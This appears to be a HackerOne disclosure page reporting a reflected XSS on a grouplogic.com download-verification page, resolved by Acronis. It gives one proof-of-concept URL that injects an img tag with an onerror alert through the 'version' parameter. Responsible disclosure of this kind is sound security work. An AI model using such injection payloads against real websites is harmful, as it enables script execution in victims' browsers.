Reflected XSS on http://www.grouplogic.com/files/glidownload/verify.asp

Disclosed: 2021-04-13 13:23:29 By ali To acronis

Low

Vulnerability Details

Hello there, I hope you are well! As I see, Group Logic is your subsidary and www.grouplogic.com is a managed website by Acronis. {F803772} I found a reflected xss on http://www.grouplogic.com/ PoC: http://www.grouplogic.com/files/glidownload/verify.asp?version=AC12%27%3E%3Cimg%20src=v%20onerror=alert(document.domain)%3E ## Impact Reflected XSS Best Regards, @mygf

Actions

View on HackerOne

Report Stats

Report ID: 859395
State: Closed
Substate: resolved
Upvotes: 80

Reflected XSS on http://www.grouplogic.com/files/glidownload/verify.asp

Vulnerability Details

Actions

Report Stats

Share this report